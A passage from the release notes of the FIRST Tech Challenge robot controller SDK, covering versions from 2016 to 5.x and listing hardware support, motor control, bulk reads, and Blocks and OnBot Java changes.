not responding to commands Specifies whether the condition is current or occurred temporarily during an OpMode run Clarifies warning when Expansion Hub is not present at startup Specifies that this condition requires a Robot Restart before the hub can be used. The hub light will now accurately reflect this state Improves logging and reduces log spam during these conditions Syncs the Control Hub time and timezone to a connected web browser programming the robot, if a Driver Station is not available. Adds bulk read functionality for REV Hubs A bulk caching mode must be set at the Hub level with LynxModule#setBulkCachingMode(). This applies to all relevant SDK hardware classes that reference that Hub. The following following Hub bulk caching modes are available: BulkCachingMode.OFF (default): All hardware calls operate as usual. Bulk data can read through LynxModule#getBulkData() and processed manually. BulkCachingMode.AUTO: Applicable hardware calls are served from a bulk read cache that is cleared\/refreshed automatically to ensure identical commands don't hit the same cache. The cache can also be cleared manually with LynxModule#clearBulkCache(), although this is not recommended. (advanced users) BulkCachingMode.MANUAL: Same as BulkCachingMode.AUTO except the cache is never cleared automatically. To avoid getting stale data, the cache must be manually cleared at the beginning of each loop body or as the user deems appropriate. Removes PIDF Annotation values added in Rev 5.3 (to AndyMark, goBILDA and TETRIX motor configurations). The new motor types will still be available but their Default control behavior will revert back to Rev 5.2 Adds new ConceptMotorBulkRead sample Opmode to demonstrate and compare Motor Bulk-Read modes for reducing I\/O latencies. Version 5.3 (20191004-112306) Fixes external USB\/UVC webcam support Makes various bugfixes and improvements to Blocks page, including but not limited to: Many visual tweaks Browser zoom and window resize behave better Resizing the Java preview pane works better and more consistently across browsers The Java preview pane consistently gets scrollbars when needed The Java preview pane is hidden by default on phones Internet Explorer 11 should work Large dropdown lists display properly on lower res screens Disabled buttons are now visually identifiable as disabled A warning is shown if a user selects a TFOD sample, but their device is not compatible Warning messages in a Blocks op mode are now visible by default. Adds goBILDA 5201 and 5202 motors to Robot Configurator Adds PIDF Annotation values to AndyMark, goBILDA and TETRIX motor configurations. This has the effect of causing the RUN_USING_ENCODERS and RUN_TO_POSITION modes to use PIDF vs PID closed loop control on these motors. This should provide more responsive, yet stable, speed control. PIDF adds Feedforward control to the basic PID control loop. Feedforward is useful when controlling a motor's speed because it \"anticipates\" how much the control voltage must change to achieve a new speed set-point, rather than requiring the integrated error to change sufficiently. The PIDF values were chosen to provide responsive, yet stable, speed control on a lightly loaded motor. The more heavily a motor is loaded (drag or friction), the more noticable the PIDF improvement will be. Fixes startup crash on Android 10 Fixes ftc_app issue #712 (thanks to FROGbots-4634) Fixes ftc_app issue #542 Allows \"A\" and lowercase letters when naming device through RC and DS apps. Version 5.2 (20190905-083277) Fixes extra-wide margins on settings activities, and placement of the new configuration button Adds Skystone Vuforia image target data. Includes sample Skystone Vuforia Navigation op modes (Java). Includes sample Skystone Vuforia Navigation op modes (Blocks). Adds TensorFlow inference model (.tflite) for Skystone game elements. Includes sample Skystone TensorFlow op modes (Java). Includes sample Skystone TensorFlow op modes (Blocks). Removes older (season-specific) sample op modes. Includes 64-bit support (to comply with Google Play requirements). Protects against Stuck OpModes when a Restart Robot is requested. (Thanks to FROGbots-4634) (ftc_app issue #709) Blocks related changes: Fixes bug with blocks generated code when hardware device name is a java or javascript reserved word. Shows generated java code for blocks, even when hardware items are missing from the active configuration. Displays warning icon when outdated Vuforia and TensorFlow blocks are used (SkyStone issue #27) Version 5.1 (20190820-222104) Defines default PIDF parameters for the following motors: REV Core Hex Motor REV 20:1 HD Hex Motor REV 40:1 HD Hex Motor Adds back button when running on a device without a system back button (such as a Control Hub) Allows a REV Control Hub to update the firmware on a REV Expansion Hub via USB Fixes SkyStone issue #9 Fixes ftc_app issue #715 Prevents extra DS User clicks by filtering based on current state. Prevents incorrect DS UI state changes when receiving new OpMode list from RC Adds support for REV Color Sensor V3 Adds a manual-refresh DS Camera Stream for remotely viewing RC camera frames. To show the stream on the DS, initialize but do not run a stream-enabled opmode, select the Camera Stream option in the DS menu, and tap the image to refresh. This feature is automatically enabled when using Vuforia or TFOD—no additional RC configuration is required for typical use cases. To hide the stream, select the same menu item again. Note that gamepads are disabled and the selected opmode cannot be started while the stream is open as a safety precaution. To use custom streams, consult the API docs for CameraStreamServer#setSource and CameraStreamSource. Adds many Star Wars sounds to RobotController resources. Added SKYSTONE Sounds Chooser Sample Program. Switches out startup, connect chimes, and error\/warning sounds for Star Wars sounds Updates OnBot Java to use a WebSocket for communication with the robot The OnBot Java page no longer has to do a full refresh when a user switches from editing one file to another Known issues: Camera Stream The Vuforia camera stream inherits the issues present in the phone preview (namely ftc_app issue #574). This problem does not affect the TFOD camera stream even though it receives frames from Vuforia. The orientation of the stream frames may not always match the phone preview. For now, these frames may be rotated manually via a custom CameraStreamSource if desired. OnBotJava Browser back button may not always work correctly It's possible for a build to be queued, but not started. The OnBot Java build console will display a warning if this occurs. A user might not realize they are editing a different file if the user inadvertently switches from one file to another since this switch is now seamless. The name of the currently open file is displayed in the browser tab. Version 5.0 (built on 19.06.14) Support for the REV Robotics Control Hub. Adds a Java preview pane to the Blocks editor. Adds a new offline export feature to the Blocks editor. Display wifi channel in Network circle on Driver Station. Adds calibration for Logitech C270 Updates build tooling and target SDK. Compliance with Google's permissions infrastructure (Required after build tooling update). Keep Alives to mitigate the Motorola wifi scanning problem. Telemetry substitute no longer necessary. Improves Vuforia error reporting. Fixes ftctechnh\/ftc_app issues 621, 713. Miscellaneous bug fixes and improvements. Version 4.3 (built on 18.10.31) Includes missing TensorFlow-related libraries and files. Version 4.2 (built on 18.10.30) Includes fix to avoid deadlock situation with WatchdogMonitor which could result in USB communication errors. Comm error appeared to require that user disconnect USB cable and restart the Robot Controller app to recover. robotControllerLog.txt would have error messages that included the words \"E RobotCore: lynx xmit lock: #### abandoning lock:\" Includes fix to correctly list the parent module address for a REV Robotics Expansion Hub in a configuration (.xml) file. Bug in versions 4.0 and 4.1 would incorrect list the address module for a parent REV Robotics device as \"1\". If the parent module had a higher address value than the daisy-chained module, then this bug would prevent the Robot Controller from communicating with the downstream Expansion Hub. Added requirement for ACCESS_COARSE_LOCATION to allow a Driver Station running Android Oreo to scan for Wi-Fi Direct devices. Added google() repo to build.gradle because aapt2 must be downloaded from the google() repository beginning with version 3.2 of the Android Gradle Plugin. Important Note: Android Studio users will need to be connected to the Internet the first time build the ftc_app project. Internet connectivity is required for the first build so the appropriate files can be downloaded from the Google repository. Users should not need to be connected to the Internet for subsequent builds. This should also fix buid issue where Android Studio would complain that it \"Could not find com.android.tools.lint:lint-gradle:26.1.4\" (or similar). Added support for REV Spark Mini motor controller as part of the configuration menu for a servo\/PWM port on the REV Expansion Hub. Provide examples for playing audio files in an Op Mode. Block Development Tool Changes Includes a fix for a problem with the Velocity blocks that were reported in the FTC Technology forum (Blocks Programming subforum). Change the \"Save completed successfully.\" message to a white color so it will contrast with a green background. Fixed the \"Download image\" feature so it will work if there are text blocks in the op mode. Introduce support for Google's TensorFlow Lite technology for object detetion for 2018-2019 game. TensorFlow lite can recognize Gold Mineral and Silver Mineral from 2018-2019 game. Example Java and Block op modes are included to show how to determine the relative position of the gold block (left, center, right). Version 4.1 (released on 18.09.24) Changes include: Fix to prevent crash when deprecated configuration annotations are used. Change to allow FTC Robot Controller APK to be auto-updated using FIRST Global Control Hub update scripts. Removed samples for non supported \/ non legal hardware. Improvements to Telemetry.addData block with \"text\" socket. Updated Blocks sample op mode list to include Rover Ruckus Vuforia example. Update SDK library version number. Version 4.0 (released on 18.09.12) Changes include: Initial support for UVC compatible cameras If UVC camera has a unique serial number, RC will detect and enumerate by serial number. If UVC camera lacks a unique serial number, RC will only support one camera of that type connected. Calibration settings for a few cameras are included (see TeamCode\/src\/main\/res\/xml\/teamwebcamcalibrations.xml for details). User can upload calibration files from Program and Manage web interface. UVC cameras seem to draw a fair amount of electrical current from the USB bus. This does not appear to present any problems for the REV Robotics Control Hub. This does seem to create stability problems when using some cameras with an Android phone-based Robot Controller. FTC Tech Team is investigating options to mitigate this issue with the phone-based Robot Controllers. Updated sample Vuforia Navigation and VuMark Op Modes to demonstrate how to use an internal phone-based camera and an external UVC webcam. Support for improved motor control. REV Robotics Expansion Hub firmware 1.8 and greater will support a feed forward mechanism for closed loop motor control. FTC SDK has been modified to support PIDF coefficients (proportional, integral, derivative, and feed forward). FTC Blocks development tool modified to include PIDF programming blocks. Deprecated older PID-related methods and variables. REV's 1.8.x PIDF-related changes provide a more linear and accurate way to control a motor. Wireless Added 5GHz support for wireless channel changing for those devices that support it. Tested with Moto G5 and E4 phones. Also tested with other (currently non-approved) phones such as Samsung Galaxy S8. Improved Expansion Hub firmware update support in Robot Controller app Changes to make the system more robust during the firmware update process (when performed through Robot Controller app). User no longer has to disconnect a downstream daisy-chained Expansion Hub when updating an Expansion Hub's firmware. If user is updating an Expansion Hub's firmware through a USB connection, he\/she does not have to disconnect RS485 connection to other Expansion Hubs. The user still must use a USB connection to update an Expansion Hub's firmware. The user cannot update the Expansion Hub firmware for a downstream device that is daisy chained through an RS485 connection. If an Expansion Hub accidentally gets \"bricked\" the Robot Controller app is now more likely to recognize the Hub when it scans the USB bus. Robot Controller app should be able to detect an Expansion Hub, even if it accidentally was bricked in a previous update attempt. Robot Controller app should be able to install the firmware onto the Hub, even if if accidentally was bricked in a previous update attempt. Resiliency FTC software can detect and enable an FTDI reset feature that is available with REV Robotics v1.8 Expansion Hub firmware and greater. When enabled, the Expansion Hub can detect if it hasn't communicated with the Robot Controller over the FTDI (USB) connection. If the Hub hasn't heard from the Robot Controller in a while, it will reset the FTDI connection. This action helps system recover from some ESD-induced disruptions. Various fixes to improve reliability of FTC software. Blocks Fixed errors with string and list indices in blocks export to java. Support for USB connected UVC webcams. Refactored optimized Blocks Vuforia code to support Rover Ruckus image targets. Added programming blocks to support PIDF (proportional, integral, derivative and feed forward) motor control. Added formatting options (under Telemetry and Miscellaneous categories) so user can set how many decimal places to display a numerical value. Support to play audio files (which are uploaded through Blocks web interface) on Driver Station in addition to the Robot Controller. Fixed bug with Download Image of Blocks feature. Support for REV Robotics Blinkin LED Controller. Support for REV Robotics 2m Distance Sensor. Added support for a REV Touch Sensor (no longer have to configure as a generic digital device). Added blocks for DcMotorEx methods. These are enhanced methods that you can use when supported by the motor controller hardware. The REV Robotics Expansion Hub supports these enhanced methods. Enhanced methods include methods to get\/set motor velocity (in encoder pulses per second), get\/set PIDF coefficients, etc.. Modest Improvements in Logging Decrease frequency of battery checker voltage statements. Removed non-FTC related log statements (wherever possible). Introduced a \"Match Logging\" feature. Under \"Settings\" a user can enable\/disable this feature (it's disabled by default). If enabled, user provides a \"Match Number\" through the Driver Station user interface (top of the screen). The Match Number is used to create a log file specifically with log statements from that particular Op Mode run. Match log files are stored in \/sdcard\/FIRST\/matlogs on the Robot Controller. Once an op mode run is complete, the Match Number is cleared. This is a convenient way to create a separate match log with statements only related to a specific op mode run. New Devices Support for REV Robotics Blinkin LED Controller. Support for REV Robotics 2m Distance Sensor. Added configuration option for REV 20:1 HD Hex Motor. Added support for a REV Touch Sensor (no longer have to configure as a generic digital device). Miscellaneous Fixed some errors in the definitions for acceleration and velocity in our javadoc documentation. Added ability to play audio files on Driver Station When user is configuring an Expansion Hub, the LED on the Expansion Hub will change blink pattern (purple-cyan) to indicate which Hub is currently being configured. Renamed I2cSensorType to I2cDeviceType. Added an external sample Op Mode that demonstrates localization using 2018-2019 (Rover Ruckus presented by QualComm) Vuforia targets. Added an external sample Op Mode that demonstrates how to use the REV Robotics 2m Laser Distance Sensor. Added an external sample Op Mode that demonstrates how to use the REV Robotics Blinkin LED Controller. Re-categorized external Java sample Op Modes to \"TeleOp\" instead of \"Autonomous\". Known issues: Initial support for UVC compatible cameras UVC cameras seem to draw significant amount of current from the USB bus. This does not appear to present any problems for the REV Robotics Control Hub. This does seem to create stability problems when using some cameras with an Android phone-based Robot Controller. FTC Tech Team is investigating options to mitigate this issue with the phone-based Robot Controllers. There might be a possible deadlock which causes the RC to become unresponsive when using a UVC webcam with a Nougat Android Robot Controller. Wireless When user selects a wireless channel, this channel does not necessarily persist if the phone is power cycled. Tech Team is hoping to eventually address this issue in a future release. Issue has been present since apps were introduced (i.e., it is not new with the v4.0 release). Wireless channel is not currently displayed for WiFi Direct connections. Miscellaneous The blink indication feature that shows which Expansion Hub is currently being configured does not work for a newly created configuration file. User has to first save a newly created configuration file and then close and re-edit the file in order for blink indicator to work. Version 3.6 (built on 17.12.18) Changes include: Blocks Changes Uses updated Google Blockly software to allow users to edit their op modes on Apple iOS devices (including iPad and iPhone). Improvement in Blocks tool to handle corrupt op mode files. Autonomous op modes should no longer get switched back to tele-op after re-opening them to be edited. The system can now detect type mismatches during runtime and alert the user with a message on the Driver Station. Updated javadoc documentation for setPower() method to reflect correct range of values (-1 to +1). Modified VuforiaLocalizerImpl to allow for user rendering of frames Added a user-overrideable onRenderFrame() method which gets called by the class's renderFrame() method. Version 3.5 (built on 17.10.30) Changes with version 3.5 include: Introduced a fix to prevent random op mode stops, which can occur after the Robot Controller app has been paused and then resumed (for example, when a user temporarily turns off the display of the Robot Controller phone, and then turns the screen back on). Introduced a fix to prevent random op mode stops, which were previously caused by random peer disconnect events on the Driver Station. Fixes issue where log files would be closed on pause of the RC or DS, but not re-opened upon resume. Fixes issue with battery handler (voltage) start\/stop race. Fixes issue where Android Studio generated op modes would disappear from available list in certain situations. Fixes problem where OnBot Java would not build on REV Robotics Control Hub. Fixes problem where OnBot Java would not build if the date and time on the Robot Controller device was \"rewound\" (set to an earlier date\/time). Improved error message on OnBot Java that occurs when renaming a file fails. Removed unneeded resources from android.jar binaries used by OnBot Java to reduce final size of Robot Controller app. Added MR_ANALOG_TOUCH_SENSOR block to Blocks Programming Tool. Version 3.4 (built on 17.09.06) Changes with version 3.4 include: Added telemetry.update() statement for BlankLinearOpMode template. Renamed sample Block op modes to be more consistent with Java samples. Added some additional sample Block op modes. Reworded OnBot Java readme slightly. Version 3.3 (built on 17.09.04) This version of the software includes improves for the FTC Blocks Programming Tool and the OnBot Java Programming Tool. Changes with verion 3.3 include: Android Studio ftc_app project has been updated to use Gradle Plugin 2.3.3. Android Studio ftc_app project is already using gradle 3.5 distribution. Robot Controller log has been renamed to \/sdcard\/RobotControllerLog.txt (note that this change was actually introduced w\/ v3.2). Improvements in I2C reliability. Optimized I2C read for REV Expansion Hub, with v1.7 firmware or greater. Updated all external\/samples (available through OnBot and in Android project folder). Vuforia Added support for VuMarks that will be used for the 2017-2018 season game. Blocks Update to latest Google Blockly release. Sample op modes can be selected as a template when creating new op mode. Fixed bug where the blocks would disappear temporarily when mouse button is held down. Added blocks for Range.clip and Range.scale. User can now disable\/enable Block op modes. Fix to prevent occasional Blocks deadlock. OnBot Java Significant improvements with autocomplete function for OnBot Java editor. Sample op modes can be selected as a template when creating new op mode. Fixes and changes to complete hardware setup feature. Updated (and more useful) onBot welcome message. Known issues: Android Studio After updating to the new v3.3 Android Studio project folder, if you get error messages indicating \"InvalidVirtualFileAccessException\" then you might need to do a File->Invalidate Caches \/ Restart to clear the error. OnBot Java Sometimes when you push the build button to build all op modes, the RC returns an error message that the build failed. If you press the build button a second time, the build typically suceeds. Version 3.2 (built on 17.08.02) This version of the software introduces the \"OnBot Java\" Development Tool. Similar to the FTC Blocks Development Tool, the FTC OnBot Java Development Tool allows a user to create, edit and build op modes dynamically using only a Javascript-enabled web browser. The OnBot Java Development Tool is an integrated development environment (IDE) that is served up by the Robot Controller. Op modes are created and edited using a Javascript-enabled browser (Google Chromse is recommended). Op modes are saved on the Robot Controller Android device directly. The OnBot Java Development Tool provides a Java programming environment that does NOT need Android Studio. Changes with version 3.2 include: Enhanced web-based development tools Introduction of OnBot Java Development Tool. Web-based programming and management features are \"always on\" (user no longer needs to put Robot Controller into programming mode). Web-based management interface (where user can change Robot Controller name and also easily download Robot Controller log file). OnBot Java, Blocks and Management features available from web based interface. Blocks Programming Development Tool: Changed \"LynxI2cColorRangeSensor\" block to \"REV Color\/range sensor\" block. Fixed tooltip for ColorSensor.isLightOn block. Added blocks for ColorSensor.getNormalizedColors and LynxI2cColorRangeSensor.getNormalizedColors. Added example op modes for digital touch sensor and REV Robotics Color Distance sensor. User selectable color themes. Includes many minor enhancements and fixes (too numerous to list). Known issues: Auto complete function is incomplete and does not support the following (for now): Access via this keyword Access via super keyword Members of the super cloass, not overridden by the class Any methods provided in the current class Inner classes Can't handle casted objects Any objects coming from an parenthetically enclosed expression Version 3.10 (built on 17.05.09) This version of the software provides support for the REV Robotics Expansion Hub. This version also includes improvements in the USB communication layer in an effort to enhance system resiliency. If you were using a 2.x version of the software previously, updating to version 3.1 requires that you also update your Driver Station software in addition to updating the Robot Controller software. Also note that in version 3.10 software, the setMaxSpeed and getMaxSpeed methods are no longer available (not deprecated, they have been removed from the SDK). Also note that the the new 3.x software incorporates motor profiles that a user can select as he\/she configures the robot. Changes include: Blocks changes Added VuforiaTrackableDefaultListener.getPose and Vuforia.trackPose blocks. Added optimized blocks support for Vuforia extended tracking. Added atan2 block to the math category. Added useCompetitionFieldTargetLocations parameter to Vuforia.initialize block. If set to false, the target locations are placed at (0,0,0) with target orientation as specified in https:\/\/github.com\/gearsincorg\/FTCVuforiaDemo\/blob\/master\/Robot_Navigation.java tutorial op mode. Incorporates additional improvements to USB comm layer to improve system resiliency (to recover from a greater number of communication disruptions). Additional Notes Regarding Version 3.00 (built on 17.04.13) In addition to the release changes listed below (see section labeled \"Version 3.00 (built on 17.04.013)\"), version 3.00 has the following important changes: Version 3.00 software uses a new version of the FTC Robocol (robot protocol). If you upgrade to v3.0 on the Robot Controller and\/or Android Studio side, you must also upgrade the Driver Station software to match the new Robocol. Version 3.00 software removes the setMaxSpeed and getMaxSpeed methods from the DcMotor class. If you have an op mode that formerly used these methods, you will need to remove the references\/calls to these methods. Instead, v3.0 provides the max speed information through the use of motor profiles that are selected by the user during robot configuration. Version 3.00 software currently does not have a mechanism to disable extra i2c sensors. We hope to re-introduce this function with a release in the near future. Version 3.00 (built on 17.04.13) *** Use this version of the software at YOUR OWN RISK!!! *** This software is being released as an \"alpha\" version. Use this version at your own risk! This pre-release software contains SIGNIFICANT changes, including changes to the Wi-Fi Direct pairing mechanism, rewrites of the I2C sensor classes, changes to the USB\/FTDI layer, and the introduction of support for the REV Robotics Expansion Hub and the REV Robotics color-range-light sensor. These changes were implemented to improve the reliability and resiliency of the FTC control system. Please note, however, that version 3.00 is considered \"alpha\" code. This code is being released so that the FIRST community will have an opportunity to test the new REV Expansion Hub electronics module when it becomes available in May. The developers do not recommend using this code for critical applications (i.e., competition use). *** Use this version of the software at YOUR OWN RISK!!! *** Changes include: Major rework of sensor-related infrastructure. Includes rewriting sensor classes to implement synchronous I2C communication. Fix to reset Autonomous timer back to 30 seconds. Implementation of specific motor profiles for approved 12V motors (includes Tetrix, AndyMark, Matrix and REV models). Modest improvements to enhance Wi-Fi P2P pairing. Fixes telemetry log addition race. Publishes all the sources (not just a select few). Includes Block programming improvements Addition of optimized Vuforia blocks. Auto scrollbar to projects and sounds pages. Fixed blocks paste bug. Blocks execute after while-opModeIsActive loop (to allow for cleanup before exiting op mode). Added gyro integratedZValue block. Fixes bug with projects page for Firefox browser. Added IsSpeaking block to AndroidTextToSpeech. Implements support for the REV Robotics Expansion Hub Implements support for integral REV IMU (physically installed on I2C bus 0, uses same Bosch BNO055 9 axis absolute orientation sensor as Adafruit 9DOF abs orientation sensor). - Implements support for REV color\/range\/light sensor. Provides support to update Expansion Hub firmware through FTC SDK. Detects REV firmware version and records in log file. Includes support for REV Control Hub (note that the REV Control Hub is not yet approved for FTC use). Implements FTC Blocks programming support for REV Expansion Hub and sensor hardware. Detects and alerts when I2C device disconnect. Version 2.62 (built on 17.01.07) Added null pointer check before calling modeToByte() in finishModeSwitchIfNecessary method for ModernRoboticsUsbDcMotorController class. Changes to enhance Modern Robotics USB protocol robustness. Version 2.61 (released on 16.12.19) Blocks Programming mode changes: Fix to correct issue when an exception was thrown because an OpticalDistanceSensor object appears twice in the hardware map (the second time as a LightSensor). Version 2.6 (released on 16.12.16) Fixes for Gyro class: Improve (decrease) sensor refresh latency. fix isCalibrating issues. Blocks Programming mode changes: Blocks now ignores a device in the configuration xml if the name is empty. Other devices work in configuration work fine. Version 2.5 (internal release on released on 16.12.13) Blocks Programming mode changes: Added blocks support for AdafruitBNO055IMU. Added Download Op Mode button to FtcBocks.html. Added support for copying blocks in one OpMode and pasting them in an other OpMode. The clipboard content is stored on the phone, so the programming mode server must be running. Modified Utilities section of the toolbox. In Programming Mode, display information about the active connections. Fixed paste location when workspace has been scrolled. Added blocks support for the android Accelerometer. Fixed issue where Blocks Upload Op Mode truncated name at first dot. Added blocks support for Android SoundPool. Added type safety to blocks for Acceleration. Added type safety to blocks for AdafruitBNO055IMU.Parameters. Added type safety to blocks for AnalogInput. Added type safety to blocks for AngularVelocity. Added type safety to blocks for Color. Added type safety to blocks for ColorSensor. Added type safety to blocks for CompassSensor. Added type safety to blocks for CRServo. Added type safety to blocks for DigitalChannel. Added type safety to blocks for ElapsedTime. Added type safety to blocks for Gamepad. Added type safety to blocks for GyroSensor. Added type safety to blocks for IrSeekerSensor. Added type safety to blocks for LED. Added type safety to blocks for LightSensor. Added type safety to blocks for LinearOpMode. Added type safety to blocks for MagneticFlux. Added type safety to blocks for MatrixF. Added type safety to blocks for MrI2cCompassSensor. Added type safety to blocks for MrI2cRangeSensor. Added type safety to blocks for OpticalDistanceSensor. Added type safety to blocks for Orientation. Added type safety to blocks for Position. Added type safety to blocks for Quaternion. Added type safety to blocks for Servo. Added type safety to blocks for ServoController. Added type safety to blocks for Telemetry. Added type safety to blocks for Temperature. Added type safety to blocks for TouchSensor. Added type safety to blocks for UltrasonicSensor. Added type safety to blocks for VectorF. Added type safety to blocks for Velocity. Added type safety to blocks for VoltageSensor. Added type safety to blocks for VuforiaLocalizer.Parameters. Added type safety to blocks for VuforiaTrackable. Added type safety to blocks for VuforiaTrackables. Added type safety to blocks for enums in AdafruitBNO055IMU.Parameters. Added type safety to blocks for AndroidAccelerometer, AndroidGyroscope, AndroidOrientation, and AndroidTextToSpeech. Version 2.4 (released on 16.11.13) Fix to avoid crashing for nonexistent resources. Blocks Programming mode changes: Added blocks to support OpenGLMatrix, MatrixF, and VectorF. Added blocks to support AngleUnit, AxesOrder, AxesReference, CameraDirection, CameraMonitorFeedback, DistanceUnit, and TempUnit. Added blocks to support Acceleration. Added blocks to support LinearOpMode.getRuntime. Added blocks to support MagneticFlux and Position. Fixed typos. Made blocks for ElapsedTime more consistent with other objects. Added blocks to support Quaternion, Velocity, Orientation, AngularVelocity. Added blocks to support VuforiaTrackables, VuforiaTrackable, VuforiaLocalizer, VuforiaTrackableDefaultListener. Fixed a few blocks. Added type checking to new blocks. Updated to latest blockly. Added default variable blocks to navigation and matrix blocks. Fixed toolbox entry for openGLMatrix_rotation_withAxesArgs. When user downloads Blocks-generated op mode, only the .blk file is downloaded. When user uploads Blocks-generated op mode (.blk file), Javascript code is auto generated. Added DbgLog support. Added logging when a blocks file is read\/written. Fixed bug to properly render blocks even if missing devices from configuration file. Added support for additional characters (not just alphanumeric) for the block file names (for download and upload). Added support for OpMode flavor (“Autonomous” or “TeleOp”) and group. Changes to Samples to prevent tutorial issues. Incorporated suggested changes from public pull 216 (“Replace .. paths”). Remove Servo Glitches when robot stopped. if user hits “Cancels” when editing a configuration file, clears the unsaved changes and reverts to original unmodified configuration. Added log info to help diagnose why the Robot Controller app was terminated (for example, by watch dog function). Added ability to transfer log from the controller. Fixed inconsistency for AngularVelocity Limit unbounded growth of data for telemetry. If user does not call telemetry.update() for LinearOpMode in a timely manner, data added for telemetry might get lost if size limit is exceeded. Version 2.35 (released on 16.10.06) Blockly programming mode - Removed unnecesary idle() call from blocks for new project. Version 2.30 (released on 16.10.05) Blockly programming mode: Mechanism added to save Blockly op modes from Programming Mode Server onto local device To avoid clutter, blocks are displayed in categorized folders Added support for DigitalChannel Added support for ModernRoboticsI2cCompassSensor Added support for ModernRoboticsI2cRangeSensor Added support for VoltageSensor Added support for AnalogInput Added support for AnalogOutput Fix for CompassSensor setMode block Vuforia Fix deadlock \/ make camera data available while Vuforia is running. Update to Vuforia 6.0.117 (recommended by Vuforia and Google to close security loophole). Fix for autonomous 30 second timer bug (where timer was in effect, even though it appeared to have timed out). opModeIsActive changes to allow cleanup after op mode is stopped (with enforced 2 second safety timeout). Fix to avoid reading i2c twice. Updated sample Op Modes. Improved logging and fixed intermittent freezing. Added digital I\/O sample. Cleaned up device names in sample op modes to be consistent with Pushbot guide. Fix to allow use of IrSeekerSensorV3. Version 2.20 (released on 16.09.08) Support for Modern Robotics Compass Sensor. Support for Modern Robotics Range Sensor. Revise device names for Pushbot templates to match the names used in Pushbot guide. Fixed bug so that IrSeekerSensorV3 device is accessible as IrSeekerSensor in hardwareMap. Modified computer vision code to require an individual Vuforia license (per legal requirement from PTC). Minor fixes. Blockly enhancements: Support for Voltage Sensor. Support for Analog Input. Support for Analog Output. Support for Light Sensor. Support for Servo Controller. Version 2.10 (released on 16.09.03) Support for Adafruit IMU. Improvements to ModernRoboticsI2cGyro class Block on reset of z axis. isCalibrating() returns true while gyro is calibration. Updated sample gyro program. Blockly enhancements support for android.graphics.Color. added support for ElapsedTime. improved look and legibility of blocks. support for compass sensor. support for ultrasonic sensor. support for IrSeeker. support for LED. support for color sensor. support for CRServo prompt user to configure robot before using programming mode. Provides ability to disable audio cues. various bug fixes and improvements. Version 2.00 (released on 16.08.19) This is the new release for the upcoming 2016-2017 FIRST Tech Challenge Season. Channel change is enabled in the FTC Robot Controller app for Moto G 2nd and 3rd Gen phones. Users can now use annotations to register\/disable their Op Modes. Changes in the Android SDK, JDK and build tool requirements (minsdk=19, java 1.7, build tools 23.0.3). Standardized units in analog input. Cleaned up code for existing analog sensor classes. setChannelMode and getChannelMode were REMOVED from the DcMotorController class. This is important - we no longer set the motor modes through the motor controller. setMode and getMode were added to the DcMotor class. ContinuousRotationServo class has been added to the FTC SDK. Range.clip() method has been overloaded so it can support this operation for int, short and byte integers. Some changes have been made (new methods added) on how a user can access items from the hardware map. Users can now set the zero power behavior for a DC motor so that the motor will brake or float when power is zero. Prototype Blockly Programming Mode has been added to FTC Robot Controller. Users can place the Robot Controller into this mode, and then use a device (such as a laptop) that has a Javascript enabled browser to write Blockly-based Op Modes directly onto the Robot Controller. Users can now configure the robot remotely through the FTC Driver Station app. Android Studio project supports Android Studio 2.1.x and compile SDK Version 23 (Marshmallow). Vuforia Computer Vision SDK integrated into FTC SDK. Users can use sample vision targets to get localization information on a standard FTC field. Project structure has been reorganized so that there is now a TeamCode package that users can use to place their local\/custom Op Modes into this package. Inspection function has been integrated into the FTC Robot Controller and Driver Station Apps (Thanks Team HazMat… 9277 & 10650!). Audio cues have been incorporated into FTC SDK. Swap mechanism added to FTC Robot Controller configuration activity. For example, if you have two motor controllers on a robot, and you misidentified them in your configuration file, you can use the Swap button to swap the devices within the configuration file (so you do not have to manually re-enter in the configuration info for the two devices). Fix mechanism added to all user to replace an electronic module easily. For example, suppose a servo controller dies on your robot. You replace the broken module with a new module, which has a different serial number from the original servo controller. You can use the Fix button to automatically reconfigure your configuration file to use the serial number of the new module. Improvements made to fix resiliency and responsiveness of the system. For LinearOpMode the user now must for a telemetry.update() to update the telemetry data on the driver station. This update() mechanism ensures that the driver station gets the updated data properly and at the same time. The Auto Configure function of the Robot Controller is now template based. If there is a commonly used robot configuration, a template can be created so that the Auto Configure mechanism can be used to quickly configure a robot of this type. The logic to detect a runaway op mode (both in the LinearOpMode and OpMode types) and to abort the run, then auto recover has been improved\/implemented. Fix has been incorporated so that Logitech F310 gamepad mappings will be correct for Marshmallow users. Release 16.07.08 For the ftc_app project, the gradle files have been modified to support Android Studio 2.1.x. Release 16.03.30 For the MIT App Inventor, the design blocks have new icons that better represent the function of each design component. Some changes were made to the shutdown logic to ensure the robust shutdown of some of our USB services. A change was made to LinearOpMode so as to allow a given instance to be executed more than once, which is required for the App Inventor. Javadoc improved\/updated. Release 16.03.09 Changes made to make the FTC SDK synchronous (significant change!) waitOneFullHardwareCycle() and waitForNextHardwareCycle() are no longer needed and have been deprecated. runOpMode() (for a LinearOpMode) is now decoupled from the system's hardware read\/write thread. loop() (for an OpMode) is now decoupled from the system's hardware read\/write thread. Methods are synchronous. For example, if you call setMode(DcMotorController.RunMode.RESET_ENCODERS) for a motor, the encoder is guaranteed to be reset when the method call is complete. For legacy module (NXT compatible), user no longer has to toggle between read and write modes when reading from or writing to a legacy device. Changes made to enhance reliability\/robustness during ESD event. Changes made to make code thread safe. Debug keystore added so that user-generated robot controller APKs will all use the same signed key (to avoid conflicts if a team has multiple developer laptops for example). Firmware version information for Modern Robotics modules are now logged. Changes made to improve USB comm reliability and robustness. Added support for voltage indicator for legacy (NXT-compatible) motor controllers. Changes made to provide auto stop capabilities for op modes. A LinearOpMode class will stop when the statements in runOpMode() are complete. User does not have to push the stop button on the driver station. If an op mode is stopped by the driver station, but there is a run away\/uninterruptible thread persisting, the app will log an error message then force itself to crash to stop the runaway thread. Driver Station UI modified to display lowest measured voltage below current voltage (12V battery). Driver Station UI modified to have color background for current voltage (green=good, yellow=caution, red=danger, extremely low voltage). javadoc improved (edits and additional classes). Added app build time to About activity for driver station and robot controller apps. Display local IP addresses on Driver Station About activity. Added I2cDeviceSynchImpl. Added I2cDeviceSync interface. Added seconds() and milliseconds() to ElapsedTime for clarity. Added getCallbackCount() to I2cDevice. Added missing clearI2cPortActionFlag. Added code to create log messages while waiting for LinearOpMode shutdown. Fix so Wifi Direct Config activity will no longer launch multiple times. Added the ability to specify an alternate i2c address in software for the Modern Robotics gyro. Release 16.02.09 Improved battery checker feature so that voltage values get refreshed regularly (every 250 msec) on Driver Station (DS) user interface. Improved software so that Robot Controller (RC) is much more resilient and “self-healing” to USB disconnects: If user attempts to start\/restart RC with one or more 